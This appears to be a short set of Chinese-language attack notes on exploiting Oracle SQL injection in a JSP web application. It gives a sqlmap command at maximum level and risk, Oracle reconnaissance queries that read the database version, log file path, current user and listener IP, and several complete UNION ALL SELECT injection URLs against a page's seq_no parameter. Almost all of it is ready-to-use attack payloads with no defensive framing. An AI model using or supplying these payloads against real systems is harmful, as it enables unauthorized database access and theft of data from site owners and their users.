在oracle语句无法闭合sql,并且显示不出我想要查询数据..,sqlmap也无法跑出来测试的语句
查询版本
查询日志文件路径(判断linux|windows)
读取Oracle当前数据库连接用户名
sqlmap.py -u "http://website.com.vv/outpage/result2.jsp" --data="y=0&x=0&sfz=atestu&zjh=2457" --level 5 --risk 3
- select banner from sys.v_$version where rownum=1 查询版本
select member from v$logfile where rownum=1 查询日志文件路径(判断linux|windows)select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual 读取Oracle当前数据库连接用户名select utl_inaddr.get_host_address from dual 查询数据库监听IP
http://website.com.vv/event200804/view.jsp?seq_no=-1248' UNION ALL SELECT NULL,NULL,NULL,NULL,(注入语 句),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &CB=1&CP=1
http://website.com.vv/event200804/view.jsp?seq_no=-1248' UNION ALL SELECT NULL,NULL,NULL,NULL,(select banner from sys.v_$version where rownum=1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &CB=1&CP=1
http://website.com.vv/event200804/view.jsp?seq_no=-1248' UNION ALL SELECT NULL,NULL,NULL,NULL,(select member from v$logfile where rownum=1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &CB=1&CP=1
http://website.com.vv/event200804/view.jsp?seq_no=-1248' UNION ALL SELECT NULL,NULL,NULL,NULL,(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &CB=1&CP=1